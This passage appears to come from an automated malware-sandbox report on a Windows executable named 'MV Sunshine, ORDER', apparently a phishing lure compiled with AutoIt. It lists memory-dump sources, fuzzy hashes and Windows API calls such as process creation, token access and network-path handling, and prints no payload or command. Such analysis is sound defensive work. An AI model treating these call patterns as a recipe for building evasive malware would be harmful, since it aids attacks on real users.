                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
                      • Instruction ID: 479d7fd1098e5ff1bad317bdf234b790cae376e77ca075942f5122a724377bf0
                      • Opcode Fuzzy Hash: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
                      • Instruction Fuzzy Hash: 17115E79941218FFDB10EFA5CC84F9DBB78FB48310F204096E904B7250D6726E11DB90
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                      • GetClientRect.USER32(?,?), ref: 009BB84B
                      • GetCursorPos.USER32(?), ref: 009BB855
                      • ScreenToClient.USER32(?,?), ref: 009BB860
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Client$CursorLongProcRectScreenWindow
                      • String ID:
                      • API String ID: 4127811313-0
                      • Opcode ID: 384ba36335113bb4a5361f5fc65d58520d42e6cbd9c2bb2e36e640239dcbce75
                      • Instruction ID: 3bde4de598f28cc818e495222050f9c77d83837ef41fa869d31643812e9765e7
                      • Opcode Fuzzy Hash: 384ba36335113bb4a5361f5fc65d58520d42e6cbd9c2bb2e36e640239dcbce75
                      • Instruction Fuzzy Hash: 3F110639A0011EAFCB10EFA8D8859EE77BCEB46311F104456F921E7251D730BA538BA5
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E166F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E1694
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E169E
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E16D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: 87a1f453eb373b2bfb0840c81da69d0a9cbd617cd715b1d3521bfe8d5bd4efca
                      • Instruction ID: 846fd7693b4a37364720ea6a17dffd6ddfa8e550df6f7fda4cddeaeb4d4bf43e
                      • Opcode Fuzzy Hash: 87a1f453eb373b2bfb0840c81da69d0a9cbd617cd715b1d3521bfe8d5bd4efca
                      • Instruction Fuzzy Hash: E3113631C0051DEBCF01AFA6D888AEEBB78FF09B41F044559EA44B6240CB3059618BD6
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: 876ff9151c26e2435fbff5b288ee71000dde801e1d94b9ac7da693a5c4287efd
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 1E01403604414ABBCF125EC4CD418EE7F66BF99361F598615FA2868031D237C9B1AB81
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00A0B59E
                      • ScreenToClient.USER32(?,?), ref: 00A0B5B6
                      • ScreenToClient.USER32(?,?), ref: 00A0B5DA
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0B5F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                      • Instruction ID: 3f1fc7fec7f3e97baebd4e4c176a321219543a7fe668c3d42a56735b3b4786ce
                      • Opcode Fuzzy Hash: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                      • Instruction Fuzzy Hash: 831166B5D0024DEFDB11CF99D8849EEFBB9FB08310F104166E915E3620D735AA618F50
                      APIs
                      • _memset.LIBCMT ref: 00A0B8FE
                      • _memset.LIBCMT ref: 00A0B90D
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A47F20,00A47F64), ref: 00A0B93C
                      • CloseHandle.KERNEL32 ref: 00A0B94E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memset$CloseCreateHandleProcess
                      • String ID:
                      • API String ID: 3277943733-0
                      • Opcode ID: 1ec2156d620cfb0b4798bdd553b52db6a6d296e01956239b9744183c530c369c
                      • Instruction ID: 30f5e3105e1af22040879dbd557345ba643ffdc6e62a94649d33e3a9823a274d
                      • Opcode Fuzzy Hash: 1ec2156d620cfb0b4798bdd553b52db6a6d296e01956239b9744183c530c369c
                      • Instruction Fuzzy Hash: 6FF05EBA5443547FE210ABA1AC05FBF7A5CEB4A754F004420BB08E9292E7724D06C7A9
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 009E6E88
                        • Part of subcall function 009E794E: _memset.LIBCMT ref: 009E7983
                      • _memmove.LIBCMT ref: 009E6EAB
                      • _memset.LIBCMT ref: 009E6EB8
                      • LeaveCriticalSection.KERNEL32(?), ref: 009E6EC8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: bebc14c5579d9e803ada6ea2af5648da92cef2790f33e22b9056af89356e205d
                      • Instruction ID: e534976ba7c04b74e9281d8205ee376d9ea12b0d9a91750635d85407cebfee6e
                      • Opcode Fuzzy Hash: bebc14c5579d9e803ada6ea2af5648da92cef2790f33e22b9056af89356e205d
                      • Instruction Fuzzy Hash: E5F0543A100214ABCF116F95DC85B8AFB29EF89320F04C061FE085E217C731E912CBB5
                      APIs
                        • Part of subcall function 009812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
                        • Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098135C
                        • Part of subcall function 009812F3: BeginPath.GDI32(?), ref: 00981373
                        • Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098139C
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A0C030
                      • LineTo.GDI32(00000000,?,?), ref: 00A0C03D
                      • EndPath.GDI32(00000000), ref: 00A0C04D
                      • StrokePath.GDI32(00000000), ref: 00A0C05B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 9cd944e53e632c654933f4d185dbf96b12ac0187aa50537069ffd7db91c14243
                      • Instruction ID: 8275e29041171ff324b24132e2ce7b9d6df93d14b51e4b7a3fc61c800eb8fe8d
                      • Opcode Fuzzy Hash: 9cd944e53e632c654933f4d185dbf96b12ac0187aa50537069ffd7db91c14243
                      • Instruction Fuzzy Hash: 18F05E3600125DBBDB22AF94AC09FCE3F59AF16321F048110FA11614E287B55567DBD5
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009DA399
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA3AC
                      • GetCurrentThreadId.KERNEL32 ref: 009DA3B3
                      • AttachThreadInput.USER32(00000000), ref: 009DA3BA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: 61e8e073c19c838ddfb49f45487044a9ec62cb686091f2c4360caf2696b39e85
                      • Instruction ID: 73e8e44af70be1d11f9987a8ea6382359526fed44dd0b9c5e5aae0c0ec753c3d
                      • Opcode Fuzzy Hash: 61e8e073c19c838ddfb49f45487044a9ec62cb686091f2c4360caf2696b39e85
                      • Instruction Fuzzy Hash: 54E0393118136CBADB209BA2DC0CED7BF1DEF167A1F008025F608A4460CA76C552CBA0
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00982231
                      • SetTextColor.GDI32(?,000000FF), ref: 0098223B
                      • SetBkMode.GDI32(?,00000001), ref: 00982250
                      • GetStockObject.GDI32(00000005), ref: 00982258
                      • GetWindowDC.USER32(?,00000000), ref: 009BC0D3
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 009BC0E0
                      • GetPixel.GDI32(00000000,?,00000000), ref: 009BC0F9
                      • GetPixel.GDI32(00000000,00000000,?), ref: 009BC112
                      • GetPixel.GDI32(00000000,?,?), ref: 009BC132
                      • ReleaseDC.USER32(?,00000000), ref: 009BC13D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: bf8061f46f28787ecbbfd86b7de633a9a04856fe39ff17415f1b9ab67e3c5e94
                      • Instruction ID: 1e47d6874a4edcf3c1e41e2db44e4680b593f74b55bd4214c438499d5c9c7c04
                      • Opcode Fuzzy Hash: bf8061f46f28787ecbbfd86b7de633a9a04856fe39ff17415f1b9ab67e3c5e94
                      • Instruction Fuzzy Hash: CAE03932104248EEDF219FA8EC0D7D83B14AB05332F008366FB69680E187714992DB11
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 009D8C63
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,009D882E), ref: 009D8C6A
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009D882E), ref: 009D8C77
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,009D882E), ref: 009D8C7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                      • Instruction ID: 57e1ada363d3d9d3d6a0143f795e2163140a9d05c95feba9a552bf4f38938e16
                      • Opcode Fuzzy Hash: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                      • Instruction Fuzzy Hash: 29E04F36642215DFD7309FF06D0CB973BACAF54792F048828B685E9041EA3484438B61
                      APIs
                      • GetDesktopWindow.USER32 ref: 009C2187
                      • GetDC.USER32(00000000), ref: 009C2191
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009C21B1
                      • ReleaseDC.USER32(?), ref: 009C21D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 1469d2ae8c8e5863c165fcff2978ee54a91b5cd415756da4142f8b9a8b10b35e
                      • Instruction ID: 26ccacf7fe60bad078614e68f6b89918b4b6a804cb301d709c2b02d391d97070
                      • Opcode Fuzzy Hash: 1469d2ae8c8e5863c165fcff2978ee54a91b5cd415756da4142f8b9a8b10b35e
                      • Instruction Fuzzy Hash: 40E01AB5800608EFDB51EFA0C808BADBBF1EB4C350F108429F95AA7720DB3991439F40
                      APIs
                      • GetDesktopWindow.USER32 ref: 009C219B
                      • GetDC.USER32(00000000), ref: 009C21A5
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009C21B1
                      • ReleaseDC.USER32(?), ref: 009C21D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 20f8915f2c3d6ffa93c2d7a861d8ab13581d15d297eb10bd578648218f3e1030
                      • Instruction ID: dbcff569e39f59dadb8202215eb4498e9644817a0502adbdf354d566e7eedf87
                      • Opcode Fuzzy Hash: 20f8915f2c3d6ffa93c2d7a861d8ab13581d15d297eb10bd578648218f3e1030
                      • Instruction Fuzzy Hash: 98E012B5800608AFCB61EFB0C8086ADBBF1EB4C310F108429F95AA7720DB3991439F40
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 009DB981
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 3565006973-3941886329
                      • Opcode ID: 148cb914d0c6c743a8ac1e9e4a6578d18acd7ee55c01e2b80958cae3edbb0573
                      • Instruction ID: c49d6186616de0c1f2112499a4aef1b11656427869deec48dad2ec5aa32609bf
                      • Opcode Fuzzy Hash: 148cb914d0c6c743a8ac1e9e4a6578d18acd7ee55c01e2b80958cae3edbb0573
                      • Instruction Fuzzy Hash: AB913874640601EFDB24DF68C894B6ABBE8BF49710F15856EF94ACB791DB70E840CB50
                      APIs
                        • Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • __wcsnicmp.LIBCMT ref: 009EB298
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009EB361
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: 5a39b7d73391f0595d04aef6d11b6f63580d8bad77f682e62257169b52e8ba40
                      • Instruction ID: 73921f693b4f82ad379b2defbcfa55eff746002b08e0674ac2d062b3c4b5c266
                      • Opcode Fuzzy Hash: 5a39b7d73391f0595d04aef6d11b6f63580d8bad77f682e62257169b52e8ba40
                      • Instruction Fuzzy Hash: 67618375A00215EFCB15EF99C882FBEB7B8AF48310F15445AF556AB391DB70AE40CB90
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00992AC8
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00992AE1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: b0d2e129dee7e384838af2123e2fc2971bde92128cd2ae7cab376e528191efcd
                      • Instruction ID: 1c193ddcea4f7e0436de37d9b4e571e84807d13b591b226402bbb0cc4b3a79ac
                      • Opcode Fuzzy Hash: b0d2e129dee7e384838af2123e2fc2971bde92128cd2ae7cab376e528191efcd
                      • Instruction Fuzzy Hash: C25157714187449BD320BF54D886BBBBBE8FBC4314F56885DF1DA911A1DB30852ACB26
                      APIs
                        • Part of subcall function 0098506B: __fread_nolock.LIBCMT ref: 00985089
                      • _wcscmp.LIBCMT ref: 009E9AAE
                      • _wcscmp.LIBCMT ref: 009E9AC1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _wcscmp$__fread_nolock
                      • String ID: FILE
                      • API String ID: 4029003684-3121273764
                      • Opcode ID: b3d5f4a8b0b1ebc1c5b1484f8cf0afe2727979c6e43f83a6ea85eb028dc40cda
                      • Instruction ID: 29505188531f0fda06bccc9ddd025738ed2d87eb6164463849d0dbf4af87ef37
                      • Opcode Fuzzy Hash: b3d5f4a8b0b1ebc1c5b1484f8cf0afe2727979c6e43f83a6ea85eb028dc40cda
                      • Instruction Fuzzy Hash: 3E411671A00609BADF21AEA5DC45FEFB7FDDF85710F010469B904E7281CA759E0487A1
                      APIs
                      • _memset.LIBCMT ref: 009F2892
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009F28C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: 31fa5a4a03c0c63284cd2d844c58c4cec4a5976a66cb53fd2401c80e2da73f2c
                      • Instruction ID: 8f08096f1fc6ef099c4d1ee38a0f799e6020d22e4fb4c7ce25470996dc101b13
                      • Opcode Fuzzy Hash: 31fa5a4a03c0c63284cd2d844c58c4cec4a5976a66cb53fd2401c80e2da73f2c
                      • Instruction Fuzzy Hash: D7313C71804119AFCF01EFA1CC85EEEBFB9FF48300F104029F915A6266DB319A56DBA0
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A07DD0
